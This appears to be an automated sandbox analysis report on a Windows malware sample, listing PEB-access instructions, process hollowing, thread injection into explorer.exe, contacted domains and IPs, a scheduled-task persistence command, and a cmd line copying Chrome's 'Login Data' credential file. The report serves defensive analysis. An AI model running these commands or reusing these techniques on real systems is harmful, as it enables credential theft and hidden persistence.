Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04706DC9 mov eax, dword ptr fs:[00000030h] 13_2_04706DC9
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04706DC9 mov eax, dword ptr fs:[00000030h] 13_2_04706DC9
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04706DC9 mov eax, dword ptr fs:[00000030h] 13_2_04706DC9
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04706DC9 mov ecx, dword ptr fs:[00000030h] 13_2_04706DC9
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04706DC9 mov eax, dword ptr fs:[00000030h] 13_2_04706DC9
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04706DC9 mov eax, dword ptr fs:[00000030h] 13_2_04706DC9
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B35A1 mov eax, dword ptr fs:[00000030h] 13_2_046B35A1
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047505AC mov eax, dword ptr fs:[00000030h] 13_2_047505AC
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047505AC mov eax, dword ptr fs:[00000030h] 13_2_047505AC
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B1DB5 mov eax, dword ptr fs:[00000030h] 13_2_046B1DB5
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B1DB5 mov eax, dword ptr fs:[00000030h] 13_2_046B1DB5
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B1DB5 mov eax, dword ptr fs:[00000030h] 13_2_046B1DB5
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04682D8A mov eax, dword ptr fs:[00000030h] 13_2_04682D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04682D8A mov eax, dword ptr fs:[00000030h] 13_2_04682D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04682D8A mov eax, dword ptr fs:[00000030h] 13_2_04682D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04682D8A mov eax, dword ptr fs:[00000030h] 13_2_04682D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04682D8A mov eax, dword ptr fs:[00000030h] 13_2_04682D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B2581 mov eax, dword ptr fs:[00000030h] 13_2_046B2581
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B2581 mov eax, dword ptr fs:[00000030h] 13_2_046B2581
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B2581 mov eax, dword ptr fs:[00000030h] 13_2_046B2581
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B2581 mov eax, dword ptr fs:[00000030h] 13_2_046B2581
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BFD9B mov eax, dword ptr fs:[00000030h] 13_2_046BFD9B
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BFD9B mov eax, dword ptr fs:[00000030h] 13_2_046BFD9B
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0469766D mov eax, dword ptr fs:[00000030h] 13_2_0469766D
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046AAE73 mov eax, dword ptr fs:[00000030h] 13_2_046AAE73
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046AAE73 mov eax, dword ptr fs:[00000030h] 13_2_046AAE73
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046AAE73 mov eax, dword ptr fs:[00000030h] 13_2_046AAE73
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046AAE73 mov eax, dword ptr fs:[00000030h] 13_2_046AAE73
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046AAE73 mov eax, dword ptr fs:[00000030h] 13_2_046AAE73
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04697E41 mov eax, dword ptr fs:[00000030h] 13_2_04697E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04697E41 mov eax, dword ptr fs:[00000030h] 13_2_04697E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04697E41 mov eax, dword ptr fs:[00000030h] 13_2_04697E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04697E41 mov eax, dword ptr fs:[00000030h] 13_2_04697E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04697E41 mov eax, dword ptr fs:[00000030h] 13_2_04697E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04697E41 mov eax, dword ptr fs:[00000030h] 13_2_04697E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0474AE44 mov eax, dword ptr fs:[00000030h] 13_2_0474AE44
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0474AE44 mov eax, dword ptr fs:[00000030h] 13_2_0474AE44
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468E620 mov eax, dword ptr fs:[00000030h] 13_2_0468E620
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0473FE3F mov eax, dword ptr fs:[00000030h] 13_2_0473FE3F
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468C600 mov eax, dword ptr fs:[00000030h] 13_2_0468C600
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468C600 mov eax, dword ptr fs:[00000030h] 13_2_0468C600
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468C600 mov eax, dword ptr fs:[00000030h] 13_2_0468C600
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B8E00 mov eax, dword ptr fs:[00000030h] 13_2_046B8E00
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BA61C mov eax, dword ptr fs:[00000030h] 13_2_046BA61C
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BA61C mov eax, dword ptr fs:[00000030h] 13_2_046BA61C
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04741608 mov eax, dword ptr fs:[00000030h] 13_2_04741608
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B16E0 mov ecx, dword ptr fs:[00000030h] 13_2_046B16E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046976E2 mov eax, dword ptr fs:[00000030h] 13_2_046976E2
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04758ED6 mov eax, dword ptr fs:[00000030h] 13_2_04758ED6
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B36CC mov eax, dword ptr fs:[00000030h] 13_2_046B36CC
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C8EC7 mov eax, dword ptr fs:[00000030h] 13_2_046C8EC7
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0473FEC0 mov eax, dword ptr fs:[00000030h] 13_2_0473FEC0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04750EA5 mov eax, dword ptr fs:[00000030h] 13_2_04750EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04750EA5 mov eax, dword ptr fs:[00000030h] 13_2_04750EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04750EA5 mov eax, dword ptr fs:[00000030h] 13_2_04750EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047046A7 mov eax, dword ptr fs:[00000030h] 13_2_047046A7
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0471FE87 mov eax, dword ptr fs:[00000030h] 13_2_0471FE87
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0469FF60 mov eax, dword ptr fs:[00000030h] 13_2_0469FF60
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04758F6A mov eax, dword ptr fs:[00000030h] 13_2_04758F6A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0469EF40 mov eax, dword ptr fs:[00000030h] 13_2_0469EF40
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04684F2E mov eax, dword ptr fs:[00000030h] 13_2_04684F2E
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04684F2E mov eax, dword ptr fs:[00000030h] 13_2_04684F2E
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BE730 mov eax, dword ptr fs:[00000030h] 13_2_046BE730
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0471FF10 mov eax, dword ptr fs:[00000030h] 13_2_0471FF10
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0471FF10 mov eax, dword ptr fs:[00000030h] 13_2_0471FF10
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BA70E mov eax, dword ptr fs:[00000030h] 13_2_046BA70E
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BA70E mov eax, dword ptr fs:[00000030h] 13_2_046BA70E
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0475070D mov eax, dword ptr fs:[00000030h] 13_2_0475070D
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0475070D mov eax, dword ptr fs:[00000030h] 13_2_0475070D
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046AF716 mov eax, dword ptr fs:[00000030h] 13_2_046AF716
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C37F5 mov eax, dword ptr fs:[00000030h] 13_2_046C37F5
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04707794 mov eax, dword ptr fs:[00000030h] 13_2_04707794
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04707794 mov eax, dword ptr fs:[00000030h] 13_2_04707794
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04707794 mov eax, dword ptr fs:[00000030h] 13_2_04707794
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04698794 mov eax, dword ptr fs:[00000030h] 13_2_04698794
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04751074 mov eax, dword ptr fs:[00000030h] 13_2_04751074
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04742073 mov eax, dword ptr fs:[00000030h] 13_2_04742073
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046A0050 mov eax, dword ptr fs:[00000030h] 13_2_046A0050
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046A0050 mov eax, dword ptr fs:[00000030h] 13_2_046A0050
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0469B02A mov eax, dword ptr fs:[00000030h] 13_2_0469B02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0469B02A mov eax, dword ptr fs:[00000030h] 13_2_0469B02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0469B02A mov eax, dword ptr fs:[00000030h] 13_2_0469B02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0469B02A mov eax, dword ptr fs:[00000030h] 13_2_0469B02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B002D mov eax, dword ptr fs:[00000030h] 13_2_046B002D
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B002D mov eax, dword ptr fs:[00000030h] 13_2_046B002D
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B002D mov eax, dword ptr fs:[00000030h] 13_2_046B002D
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B002D mov eax, dword ptr fs:[00000030h] 13_2_046B002D
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B002D mov eax, dword ptr fs:[00000030h] 13_2_046B002D
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04754015 mov eax, dword ptr fs:[00000030h] 13_2_04754015
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04754015 mov eax, dword ptr fs:[00000030h] 13_2_04754015
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04707016 mov eax, dword ptr fs:[00000030h] 13_2_04707016
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04707016 mov eax, dword ptr fs:[00000030h] 13_2_04707016
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04707016 mov eax, dword ptr fs:[00000030h] 13_2_04707016
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046858EC mov eax, dword ptr fs:[00000030h] 13_2_046858EC
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0471B8D0 mov eax, dword ptr fs:[00000030h] 13_2_0471B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0471B8D0 mov ecx, dword ptr fs:[00000030h] 13_2_0471B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0471B8D0 mov eax, dword ptr fs:[00000030h] 13_2_0471B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0471B8D0 mov eax, dword ptr fs:[00000030h] 13_2_0471B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0471B8D0 mov eax, dword ptr fs:[00000030h] 13_2_0471B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0471B8D0 mov eax, dword ptr fs:[00000030h] 13_2_0471B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C90AF mov eax, dword ptr fs:[00000030h] 13_2_046C90AF
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B20A0 mov eax, dword ptr fs:[00000030h] 13_2_046B20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B20A0 mov eax, dword ptr fs:[00000030h] 13_2_046B20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B20A0 mov eax, dword ptr fs:[00000030h] 13_2_046B20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B20A0 mov eax, dword ptr fs:[00000030h] 13_2_046B20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B20A0 mov eax, dword ptr fs:[00000030h] 13_2_046B20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B20A0 mov eax, dword ptr fs:[00000030h] 13_2_046B20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BF0BF mov ecx, dword ptr fs:[00000030h] 13_2_046BF0BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BF0BF mov eax, dword ptr fs:[00000030h] 13_2_046BF0BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BF0BF mov eax, dword ptr fs:[00000030h] 13_2_046BF0BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04689080 mov eax, dword ptr fs:[00000030h] 13_2_04689080
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04703884 mov eax, dword ptr fs:[00000030h] 13_2_04703884
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04703884 mov eax, dword ptr fs:[00000030h] 13_2_04703884
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468C962 mov eax, dword ptr fs:[00000030h] 13_2_0468C962
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468B171 mov eax, dword ptr fs:[00000030h] 13_2_0468B171
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468B171 mov eax, dword ptr fs:[00000030h] 13_2_0468B171
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046AB944 mov eax, dword ptr fs:[00000030h] 13_2_046AB944
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046AB944 mov eax, dword ptr fs:[00000030h] 13_2_046AB944
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046A4120 mov eax, dword ptr fs:[00000030h] 13_2_046A4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046A4120 mov eax, dword ptr fs:[00000030h] 13_2_046A4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046A4120 mov eax, dword ptr fs:[00000030h] 13_2_046A4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046A4120 mov eax, dword ptr fs:[00000030h] 13_2_046A4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046A4120 mov ecx, dword ptr fs:[00000030h] 13_2_046A4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B513A mov eax, dword ptr fs:[00000030h] 13_2_046B513A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B513A mov eax, dword ptr fs:[00000030h] 13_2_046B513A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04689100 mov eax, dword ptr fs:[00000030h] 13_2_04689100
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04689100 mov eax, dword ptr fs:[00000030h] 13_2_04689100
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04689100 mov eax, dword ptr fs:[00000030h] 13_2_04689100
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0468B1E1
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0468B1E1
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0468B1E1
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047141E8 mov eax, dword ptr fs:[00000030h] 13_2_047141E8
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B61A0 mov eax, dword ptr fs:[00000030h] 13_2_046B61A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B61A0 mov eax, dword ptr fs:[00000030h] 13_2_046B61A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047051BE mov eax, dword ptr fs:[00000030h] 13_2_047051BE
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047051BE mov eax, dword ptr fs:[00000030h] 13_2_047051BE
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047051BE mov eax, dword ptr fs:[00000030h] 13_2_047051BE
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047051BE mov eax, dword ptr fs:[00000030h] 13_2_047051BE
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_047069A6 mov eax, dword ptr fs:[00000030h] 13_2_047069A6
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046AC182 mov eax, dword ptr fs:[00000030h] 13_2_046AC182
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046BA185 mov eax, dword ptr fs:[00000030h] 13_2_046BA185
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B2990 mov eax, dword ptr fs:[00000030h] 13_2_046B2990
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0473B260 mov eax, dword ptr fs:[00000030h] 13_2_0473B260
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0473B260 mov eax, dword ptr fs:[00000030h] 13_2_0473B260
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C927A mov eax, dword ptr fs:[00000030h] 13_2_046C927A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04758A62 mov eax, dword ptr fs:[00000030h] 13_2_04758A62
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0474EA55 mov eax, dword ptr fs:[00000030h] 13_2_0474EA55
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04714257 mov eax, dword ptr fs:[00000030h] 13_2_04714257
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04689240 mov eax, dword ptr fs:[00000030h] 13_2_04689240
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04689240 mov eax, dword ptr fs:[00000030h] 13_2_04689240
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04689240 mov eax, dword ptr fs:[00000030h] 13_2_04689240
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04689240 mov eax, dword ptr fs:[00000030h] 13_2_04689240
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C4A2C mov eax, dword ptr fs:[00000030h] 13_2_046C4A2C
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046C4A2C mov eax, dword ptr fs:[00000030h] 13_2_046C4A2C
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0474AA16 mov eax, dword ptr fs:[00000030h] 13_2_0474AA16
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0474AA16 mov eax, dword ptr fs:[00000030h] 13_2_0474AA16
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04698A0A mov eax, dword ptr fs:[00000030h] 13_2_04698A0A
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046A3A1C mov eax, dword ptr fs:[00000030h] 13_2_046A3A1C
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04685210 mov eax, dword ptr fs:[00000030h] 13_2_04685210
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04685210 mov ecx, dword ptr fs:[00000030h] 13_2_04685210
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04685210 mov eax, dword ptr fs:[00000030h] 13_2_04685210
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_04685210 mov eax, dword ptr fs:[00000030h] 13_2_04685210
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468AA16 mov eax, dword ptr fs:[00000030h] 13_2_0468AA16
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_0468AA16 mov eax, dword ptr fs:[00000030h] 13_2_0468AA16
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B2AE4 mov eax, dword ptr fs:[00000030h] 13_2_046B2AE4
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046B2ACB mov eax, dword ptr fs:[00000030h] 13_2_046B2ACB
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046852A5 mov eax, dword ptr fs:[00000030h] 13_2_046852A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046852A5 mov eax, dword ptr fs:[00000030h] 13_2_046852A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046852A5 mov eax, dword ptr fs:[00000030h] 13_2_046852A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 13_2_046852A5 mov eax, dword ptr fs:[00000030h] 13_2_046852A5
Enables debug privileges
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.riandmoara.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.priminerw.com
Source: C:\Windows\explorer.exe Network Connect: 98.124.204.16 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.reinboge.net
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Memory written: C:\Users\user\Desktop\MOe7vYpWXW.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3424 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 1240000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fendlKCsOIoiN' /XML 'C:\Users\user\AppData\Local\Temp\tmpC79C.tmp' Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process created: C:\Users\user\Desktop\MOe7vYpWXW.exe C:\Users\user\Desktop\MOe7vYpWXW.exe Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Process created: C:\Users\user\Desktop\MOe7vYpWXW.exe C:\Users\user\Desktop\MOe7vYpWXW.exe Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V Jump to behavior
Source: explorer.exe, 00000007.00000002.918985786.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000007.00000000.685589637.0000000001080000.00000002.00000001.sdmp, systray.exe, 0000000D.00000002.920158946.0000000003250000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.685589637.0000000001080000.00000002.00000001.sdmp, systray.exe, 0000000D.00000002.920158946.0000000003250000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.685589637.0000000001080000.00000002.00000001.sdmp, systray.exe, 0000000D.00000002.920158946.0000000003250000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.685589637.0000000001080000.00000002.00000001.sdmp, systray.exe, 0000000D.00000002.920158946.0000000003250000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.709637997.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Users\user\Desktop\MOe7vYpWXW.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
